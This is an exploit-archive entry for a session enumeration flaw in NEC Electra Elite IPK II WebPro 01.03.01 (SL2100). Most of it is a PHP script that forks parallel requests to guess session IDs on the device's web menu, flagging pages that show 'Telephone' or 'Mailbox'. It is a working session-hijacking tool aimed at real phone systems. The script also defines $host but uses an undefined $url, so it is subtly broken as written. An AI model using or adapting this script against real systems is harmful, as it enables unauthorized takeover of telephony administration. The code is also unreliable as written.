NEC Electra Elite IPK II WebPro version 01.03.01 suffers from a session enumeration vulnerability.
6829213002fab7cad127fcca5a2f5c7b# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration
<?php
set_time_limit(0);
$host = "192.168.0.14";
$start = 100;
$end = 30000;
$maxproc= 50;
$execute=0;
echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);
for ($i = $start; $i <= $end; $i++)
{
$pid = @pcntl_fork();
$execute++;
if ($execute >= $maxproc)
{
while (pcntl_waitpid(0, $status) != -1)
{
$status = pcntl_wexitstatus($status);
$execute =0;
usleep(3000);
}
}
if (!$pid)
{
echo $url . " checking $i\n";
login($url, $i);
flush();
exit;
}
}
function login($url, $key)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
curl_setopt($ch, CURLOPT_TIMEOUT, 80);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
$content = curl_exec($ch);
curl_close ($ch);
if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
{
die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
}
}